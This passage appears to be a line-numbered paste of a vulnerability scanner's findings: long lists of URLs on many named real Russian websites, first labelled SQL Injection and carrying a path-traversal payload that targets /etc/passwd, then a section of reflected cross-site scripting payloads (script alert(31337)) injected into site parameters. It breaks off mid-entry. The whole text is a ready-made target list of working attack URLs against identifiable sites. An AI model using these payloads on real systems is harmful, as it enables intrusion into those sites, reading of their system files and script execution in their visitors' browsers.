  2076. Vulnerability URL: http://www.topforex.ru/main.php?did=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2077.  
  2078.  
  2079. Type: SQL Injection
  2080. Protocol: http
  2081. Verb: get
  2082. Parameter: id
  2083. Vulnerability URL: http://www.tourtrans.ru/ipbindex.php?app=core&type=forums&section=rss&module=global&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2084.  
  2085.  
  2086. Type: SQL Injection
  2087. Protocol: http
  2088. Verb: get
  2089. Parameter: country_sel[]
  2090. Vulnerability URL: http://www.travel-bus.ru/search.php?type_search=country&country_sel%5B%5D=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&order=price_up
  2091.  
  2092.  
  2093. Type: SQL Injection
  2094. Protocol: http
  2095. Verb: get
  2096. Parameter: id
  2097. Vulnerability URL: http://www.tutpricol.ru/message.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2098.  
  2099.  
  2100. Type: SQL Injection
  2101. Protocol: http
  2102. Verb: get
  2103. Parameter: page_id
  2104. Vulnerability URL: http://www.uchcol.ru/viewpage.php?page_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2105.  
  2106.  
  2107. Type: SQL Injection
  2108. Protocol: http
  2109. Verb: get
  2110. Parameter: s
  2111. Vulnerability URL: http://www.udmchess.ru/index.php?s=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&categoryid=1&p2_articleid=96
  2112.  
  2113.  
  2114. Type: SQL Injection
  2115. Protocol: http
  2116. Verb: get
  2117. Parameter: id
  2118. Vulnerability URL: http://www.uph.ur.ru/inner.php?top=100001&page=journal2&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2119.  
  2120.  
  2121. Type: SQL Injection
  2122. Protocol: http
  2123. Verb: get
  2124. Parameter: iid
  2125. Vulnerability URL: http://www.uraldrev.ru/info.php?iid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2126.  
  2127.  
  2128. Type: SQL Injection
  2129. Protocol: http
  2130. Verb: get
  2131. Parameter: id
  2132. Vulnerability URL: http://www.urt.ru/index.php?Itemid=82&lang=ru&option=com_content&catid=62&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&view=article
  2133.  
  2134.  
  2135. Type: SQL Injection
  2136. Protocol: http
  2137. Verb: get
  2138. Parameter: id_exhibition
  2139. Vulnerability URL: http://www.v-expo.ru/exponents.php?id_exhibition=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2140.  
  2141.  
  2142. Type: SQL Injection
  2143. Protocol: http
  2144. Verb: get
  2145. Parameter: menu_id
  2146. Vulnerability URL: http://www.vetdrug.ru/index.php?menu_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&menu_parent_id=57
  2147.  
  2148.  
  2149. Type: SQL Injection
  2150. Protocol: http
  2151. Verb: get
  2152. Parameter: id
  2153. Vulnerability URL: http://www.viamspb.ru/?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2154.  
  2155.  
  2156. Type: SQL Injection
  2157. Protocol: http
  2158. Verb: get
  2159. Parameter: id_tov
  2160. Vulnerability URL: http://www.videocam.spb.ru/show_tov.php?id_tov=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2161.  
  2162.  
  2163. Type: SQL Injection
  2164. Protocol: http
  2165. Verb: get
  2166. Parameter: subpage
  2167. Vulnerability URL: http://www.voziminfo.ru/index.php?subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&page=delivery
  2168.  
  2169.  
  2170. Type: SQL Injection
  2171. Protocol: http
  2172. Verb: get
  2173. Parameter: fid
  2174. Vulnerability URL: http://www.winebroker.ru/section.asp?fid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2175.  
  2176.  
  2177. Type: SQL Injection
  2178. Protocol: http
  2179. Verb: get
  2180. Parameter: cmd
  2181. Vulnerability URL: http://www.wips.ru/catalog.php?cmd=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2182.  
  2183.  
  2184. Type: SQL Injection
  2185. Protocol: http
  2186. Verb: get
  2187. Parameter: rstema
  2188. Vulnerability URL: http://www.z-zaklad.ru/search.php?rstema=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&rstext=all-phpRS-all&rsvelikost=sab
  2189.  
  2190.  
  2191. Type: SQL Injection
  2192. Protocol: http
  2193. Verb: get
  2194. Parameter: project_id
  2195. Vulnerability URL: http://www.zdorovyi-dom.ru/show_project.php?project_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&group_id=10
  2196.  
  2197.  
  2198. Type: SQL Injection
  2199. Protocol: http
  2200. Verb: get
  2201. Parameter: group_id
  2202. Vulnerability URL: http://www.zdorovyi-dom.ru/show_project.php?project_id=180&group_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2203.  
  2204.  
  2205. Type: SQL Injection
  2206. Protocol: http
  2207. Verb: get
  2208. Parameter: group_id
  2209. Vulnerability URL: http://www.zdorovyi-dom.ru/projects.php?group_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2210.  
  2211.  
  2212. Type: SQL Injection
  2213. Protocol: http
  2214. Verb: get
  2215. Parameter: topic
  2216. Vulnerability URL: http://www.zootovar-spb.ru/page_24.html?topic=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2217.  
  2218.  
  2219. Type: SQL Injection
  2220. Protocol: http
  2221. Verb: get
  2222. Parameter: first
  2223. Vulnerability URL: http://www3.vspu.ac.ru/guestbook.php?first=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2224.  
  2225.  
  2226. Type: SQL Injection
  2227. Protocol: http
  2228. Verb: get
  2229. Parameter: id
  2230. Vulnerability URL: http://yaroslavl.ecologyandculture.ru/index.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2231.  
  2232.  
  2233. Type: SQL Injection
  2234. Protocol: http
  2235. Verb: get
  2236. Parameter: Itemid
  2237. Vulnerability URL: http://yartpp.ru/index.php?id=143&Itemid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&option=com_content&view=article
  2238.  
  2239.  
  2240. Type: SQL Injection
  2241. Protocol: http
  2242. Verb: get
  2243. Parameter: poz
  2244. Vulnerability URL: http://yasoft.ru/typ1.php?poz=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2245.  
  2246.  
  2247. Type: SQL Injection
  2248. Protocol: http
  2249. Verb: get
  2250. Parameter: mid
  2251. Vulnerability URL: http://zverodrom.ru/?mid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2252.  
  2253. *************************************
  2254. ********* XSS VULNERABILITY *********
  2255. *************************************
  2256.  
  2257. Type: XSS
  2258. Protocol: http
  2259. Verb: get
  2260. Parameter: tcolor
  2261. Vulnerability URL: http://ask.duediligencellc.ru/adpeeps.php?lcolor=499f4c&ver=2.0&uid=100000&bfunction=showad&bsize=text&bmode=off&btype=3&bborder=0&bstyle=google-short&bpos=default&tcolor=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&btarget=_blank&textcolor=000000&bzone=default&btotal=3
  2262.  
  2263.  
  2264. Type: XSS
  2265. Protocol: http
  2266. Verb: get
  2267. Parameter: bborder
  2268. Vulnerability URL: http://ask.duediligencellc.ru/adpeeps.php?lcolor=499f4c&ver=2.0&uid=100000&bfunction=showad&bsize=text&bmode=off&btype=3&bborder=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&bstyle=google-short&bpos=default&tcolor=0000FF&btarget=_blank&textcolor=000000&bzone=default&btotal=3
  2269.  
  2270.  
  2271. Type: XSS
  2272. Protocol: http
  2273. Verb: get
  2274. Parameter: bpos
  2275. Vulnerability URL: http://ask.duediligencellc.ru/adpeeps.php?lcolor=499f4c&ver=2.0&uid=100000&bfunction=showad&bsize=text&bmode=off&btype=3&bborder=0&bstyle=google-short&bpos=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&tcolor=0000FF&btarget=_blank&textcolor=000000&bzone=default&btotal=3
  2276.  
  2277.  
  2278. Type: XSS
  2279. Protocol: http
  2280. Verb: get
  2281. Parameter: info
  2282. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&subinfo=55&num=44
  2283.  
  2284.  
  2285. Type: XSS
  2286. Protocol: http
  2287. Verb: get
  2288. Parameter: num
  2289. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=82&subinfo=55&num=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2290.  
  2291.  
  2292. Type: XSS
  2293. Protocol: http
  2294. Verb: get
  2295. Parameter: num
  2296. Vulnerability URL: http://academy-health.ru/napravlenie.php?info=108&num=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2297.  
  2298.  
  2299. Type: XSS
  2300. Protocol: http
  2301. Verb: get
  2302. Parameter: unique
  2303. Vulnerability URL: http://auto.potrebitel.ru/pic.php?table=award_list&unique=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&id=3&picture=awd_image
  2304.  
  2305.  
  2306. Type: XSS
  2307. Protocol: http
  2308. Verb: get
  2309. Parameter: table
  2310. Vulnerability URL: http://auto.potrebitel.ru/pic.php?table=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&unique=awd_id&id=3&picture=awd_image
  2311.  
  2312.  
  2313. Type: XSS
  2314. Protocol: http
  2315. Verb: get
  2316. Parameter: cid
  2317. Vulnerability URL: http://autodaynews.ru/cat.php?cid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2318.  
  2319.  
  2320. Type: XSS
  2321. Protocol: http
  2322. Verb: get
  2323. Parameter: pid
  2324. Vulnerability URL: http://avtokorel.ru/?pid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2325.  
  2326.  
  2327. Type: XSS
  2328. Protocol: http
  2329. Verb: get
  2330. Parameter: id
  2331. Vulnerability URL: http://braintension.ru/question.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2332.  
  2333.  
  2334. Type: XSS
  2335. Protocol: http
  2336. Verb: get
  2337. Parameter: unique
  2338. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=good_list&unique=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&id=3429&picture=gud_image
  2339.  
  2340.  
  2341. Type: XSS
  2342. Protocol: http
  2343. Verb: get
  2344. Parameter: table
  2345. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&unique=gud_id&id=3429&picture=gud_image
  2346.  
  2347.  
  2348. Type: XSS
  2349. Protocol: http
  2350. Verb: get
  2351. Parameter: picture
  2352. Vulnerability URL: http://byt.potrebitel.ru/pic.php?table=good_list&unique=gud_id&id=3429&picture=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2353.  
  2354.  
  2355. Type: XSS
  2356. Protocol: http
  2357. Verb: get
  2358. Parameter: id
  2359. Vulnerability URL: http://chelyab.ru/top?do=in&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2360.  
  2361.  
  2362. Type: XSS
  2363. Protocol: http
  2364. Verb: get
  2365. Parameter: mtypeid
  2366. Vulnerability URL: http://child-toys.ru/view_catalog.php?mtypeid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2367.  
  2368.  
  2369. Type: XSS
  2370. Protocol: http
  2371. Verb: get
  2372. Parameter: id
  2373. Vulnerability URL: http://comp-car.ru/prodact.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2374.  
  2375.  
  2376. Type: XSS
  2377. Protocol: http
  2378. Verb: get
  2379. Parameter: razdel_id
  2380. Vulnerability URL: http://dariosalas.ru/?razdel_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2381.  
  2382.  
  2383. Type: XSS
  2384. Protocol: http
  2385. Verb: get
  2386. Parameter: id
  2387. Vulnerability URL: http://elizarovopark.ru/article.html?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2388.  
  2389.  
  2390. Type: XSS
  2391. Protocol: http
  2392. Verb: get
  2393. Parameter: id
  2394. Vulnerability URL: http://encycl.anthropology.ru/article.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2395.  
  2396.  
  2397. Type: XSS
  2398. Protocol: http
  2399. Verb: get
  2400. Parameter: plang
  2401. Vulnerability URL: http://hinterland.krc.karelia.ru/index.php?plang=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2402.  
  2403.  
  2404. Type: XSS
  2405. Protocol: http
  2406. Verb: get
  2407. Parameter: nid
  2408. Vulnerability URL: http://it-days.ru/?Page=articles&nid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2409.  
  2410.  
  2411. Type: XSS
  2412. Protocol: http
  2413. Verb: get
  2414. Parameter: com
  2415. Vulnerability URL: http://madcms.ru/?action=all&com=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&cat=1
  2416.  
  2417.  
  2418. Type: XSS
  2419. Protocol: http
  2420. Verb: get
  2421. Parameter: id
  2422. Vulnerability URL: http://magnitcity.ru/top?do=in&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2423.  
  2424.  
  2425. Type: XSS
  2426. Protocol: http
  2427. Verb: get
  2428. Parameter: id
  2429. Vulnerability URL: http://magzem.ru/objects.php?action=result&idsec=23&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2430.  
  2431.  
  2432. Type: XSS
  2433. Protocol: http
  2434. Verb: get
  2435. Parameter: idsec
  2436. Vulnerability URL: http://magzem.ru/objects.php?action=result&idsec=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&id=56
  2437.  
  2438.  
  2439. Type: XSS
  2440. Protocol: http
  2441. Verb: get
  2442. Parameter: table
  2443. Vulnerability URL: http://mail.eae.ru/bb_archive_vdvi.php?table=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2444.  
  2445.  
  2446. Type: XSS
  2447. Protocol: http
  2448. Verb: get
  2449. Parameter: user
  2450. Vulnerability URL: http://myrate.ru/users.php?type=VIDEO&user=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&show=515
  2451.  
  2452.  
  2453. Type: XSS
  2454. Protocol: http
  2455. Verb: get
  2456. Parameter: show
  2457. Vulnerability URL: http://myrate.ru/users.php?type=VIDEO&user=Blaze&show=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2458.  
  2459.  
  2460. Type: XSS
  2461. Protocol: http
  2462. Verb: get
  2463. Parameter: pid
  2464. Vulnerability URL: http://myt-portal.ru/articles.php?pid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2465.  
  2466.  
  2467. Type: XSS
  2468. Protocol: http
  2469. Verb: get
  2470. Parameter: id
  2471. Vulnerability URL: http://najug.ru/hotels.php?is_item=1&mode=catalog&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2472.  
  2473.  
  2474. Type: XSS
  2475. Protocol: http
  2476. Verb: get
  2477. Parameter: page
  2478. Vulnerability URL: http://ohranki.ru/index.php?page=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2479.  
  2480.  
  2481. Type: XSS
  2482. Protocol: http
  2483. Verb: get
  2484. Parameter: id
  2485. Vulnerability URL: http://old.uchitel-izd.ru/index.php?task=view&option=content&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2486.  
  2487.  
  2488. Type: XSS
  2489. Protocol: http
  2490. Verb: get
  2491. Parameter: i
  2492. Vulnerability URL: http://printluxe.ru/equipment.aspx?i=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2493.  
  2494.  
  2495. Type: XSS
  2496. Protocol: http
  2497. Verb: get
  2498. Parameter: i
  2499. Vulnerability URL: http://printluxe.ru/personal.aspx?i=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2500.  
  2501.  
  2502. Type: XSS
  2503. Protocol: http
  2504. Verb: get
  2505. Parameter: i
  2506. Vulnerability URL: http://printluxe.ru/service.aspx?i=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2507.  
  2508.  
  2509. Type: XSS
  2510. Protocol: http
  2511. Verb: get
  2512. Parameter: item_id
  2513. Vulnerability URL: http://radioanten.ru/descr.php?item_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2514.  
  2515.  
  2516. Type: XSS
  2517. Protocol: http
  2518. Verb: get
  2519. Parameter: id_frm
  2520. Vulnerability URL: http://rest.perm.ru/index.php?sub_main=show&id_frm=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2521.  
  2522.  
  2523. Type: XSS
  2524. Protocol: http
  2525. Verb: get
  2526. Parameter: xn
  2527. Vulnerability URL: http://ritchiblackmore.ru/ctlg.php?xn=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2528.  
  2529.  
  2530. Type: XSS
  2531. Protocol: http
  2532. Verb: get
  2533. Parameter: id
  2534. Vulnerability URL: http://shop.doctor-al.ru/inetshop.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2535.  
  2536.  
  2537. Type: XSS
  2538. Protocol: http
  2539. Verb: get
  2540. Parameter: productID
  2541. Vulnerability URL: http://shop.kalyany.ru/index.php?productID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2542.  
  2543.  
  2544. Type: XSS
  2545. Protocol: http
  2546. Verb: get
  2547. Parameter: id
  2548. Vulnerability URL: http://spectehsnab.ru/index1.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2549.  
  2550.  
  2551. Type: XSS
  2552. Protocol: http
  2553. Verb: get
  2554. Parameter: template
  2555. Vulnerability URL: http://store.nomination.ru/showPage.php?id=5&template=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2556.  
  2557.  
  2558. Type: XSS
  2559. Protocol: http
  2560. Verb: get
  2561. Parameter: k
  2562. Vulnerability URL: http://televizor.webcena.ru/bd-tovar.php?k=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&n=341016369
  2563.  
  2564.  
  2565. Type: XSS
  2566. Protocol: http
  2567. Verb: get
  2568. Parameter: id
  2569. Vulnerability URL: http://topruchats.ru/index.php?do=in&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2570.  
  2571.  
  2572. Type: XSS
  2573. Protocol: http
  2574. Verb: get
  2575. Parameter: rest_id
  2576. Vulnerability URL: http://ufaeda.ru/index.php?rest_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&part_id=113
  2577.  
  2578.  
  2579. Type: XSS
  2580. Protocol: http
  2581. Verb: get
  2582. Parameter: id
  2583. Vulnerability URL: http://velopenza.ru/?topic=583&doc=5&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&act=forum
  2584.  
  2585.  
  2586. Type: XSS
  2587. Protocol: http
  2588. Verb: get
  2589. Parameter: topic
  2590. Vulnerability URL: http://velopenza.ru/?topic=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&doc=5&id=2&act=forum
  2591.  
  2592.  
  2593. Type: XSS
  2594. Protocol: http
  2595. Verb: get
  2596. Parameter: Route
  2597. Vulnerability URL: http://veloserver.ru/index.php?menuitem=3&map=17&Route=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&t%5B179%5D=on&t%5B180%5D=on
  2598.  
  2599.  
  2600. Type: XSS
  2601. Protocol: http
  2602. Verb: get
  2603. Parameter: id_refer
  2604. Vulnerability URL: http://vse-aktery.ru/?id_refer=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&view=293
  2605.  
  2606.  
  2607. Type: XSS
  2608. Protocol: http
  2609. Verb: get
  2610. Parameter: fid
  2611. Vulnerability URL: http://www.41mkad.ru/picture.php?fid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2612.  
  2613.  
  2614. Type: XSS
  2615. Protocol: http
  2616. Verb: get
  2617. Parameter: lang
  2618. Vulnerability URL: http://www.akka.ru/?lang=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2619.  
  2620.  
  2621. Type: XSS
  2622. Protocol: http
  2623. Verb: get
  2624. Parameter: refer
  2625. Vulnerability URL: http://www.all-abc.ru/login.htm?refer=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2626.  
  2627.  
  2628. Type: XSS
  2629. Protocol: http
  2630. Verb: get
  2631. Parameter: cat_num
  2632. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&group=1&cat=13
  2633.  
  2634.  
  2635. Type: XSS
  2636. Protocol: http
  2637. Verb: get
  2638. Parameter: cat
  2639. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=13001&group=1&cat=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2640.  
  2641.  
  2642. Type: XSS
  2643. Protocol: http
  2644. Verb: get
  2645. Parameter: group
  2646. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=13001&group=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&cat=13
  2647.  
  2648.  
  2649. Type: XSS
  2650. Protocol: http
  2651. Verb: get
  2652. Parameter: manafactura
  2653. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&cat_num=13001&group=1&cat=13
  2654.  
  2655.  
  2656. Type: XSS
  2657. Protocol: http
  2658. Verb: get
  2659. Parameter: nocookie
  2660. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=18&nocookie=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&cod=%C7&tab=17
  2661.  
  2662.  
  2663. Type: XSS
  2664. Protocol: http
  2665. Verb: get
  2666. Parameter: cod
  2667. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=14&cod=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&tab=13
  2668.  
  2669.  
  2670. Type: XSS
  2671. Protocol: http
  2672. Verb: get
  2673. Parameter: tp
  2674. Vulnerability URL: http://www.auto-krasnodar.ru/news.php?tp=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2675.  
  2676.  
  2677. Type: XSS
  2678. Protocol: http
  2679. Verb: get
  2680. Parameter: cod
  2681. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=18&nocookie=1&cod=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&tab=17
  2682.  
  2683.  
  2684. Type: XSS
  2685. Protocol: http
  2686. Verb: get
  2687. Parameter: tab
  2688. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=18&nocookie=1&cod=%C7&tab=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2689.  
  2690.  
  2691. Type: XSS
  2692. Protocol: http
  2693. Verb: get
  2694. Parameter: tab
  2695. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=14&cod=%C0&tab=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2696.  
  2697.  
  2698. Type: XSS
  2699. Protocol: http
  2700. Verb: get
  2701. Parameter: id
  2702. Vulnerability URL: http://www.avadiz.ru/production?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&show=lev4
  2703.  
  2704.  
  2705. Type: XSS
  2706. Protocol: http
  2707. Verb: get
  2708. Parameter: page_id
  2709. Vulnerability URL: http://www.bbtravel.ru/index.php?id_parent=2&page_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2710.  
  2711.  
  2712. Type: XSS
  2713. Protocol: http
  2714. Verb: get
  2715. Parameter: id
  2716. Vulnerability URL: http://www.bemnw.ru/?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&module=articles
  2717.  
  2718.  
  2719. Type: XSS
  2720. Protocol: http
  2721. Verb: get
  2722. Parameter: pageid
  2723. Vulnerability URL: http://www.bobrov.ru/?pageid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2724.  
  2725.  
  2726. Type: XSS
  2727. Protocol: http
  2728. Verb: get
  2729. Parameter: page
  2730. Vulnerability URL: http://www.clavel-trade.ru/catalog2.php?page=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&id=0005
  2731.  
  2732.  
  2733. Type: XSS
  2734. Protocol: http
  2735. Verb: get
  2736. Parameter: id_rubric
  2737. Vulnerability URL: http://www.delta-print.ru/catalogue?id_rubric=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2738.  
  2739.  
  2740. Type: XSS
  2741. Protocol: http
  2742. Verb: get
  2743. Parameter: id_kino
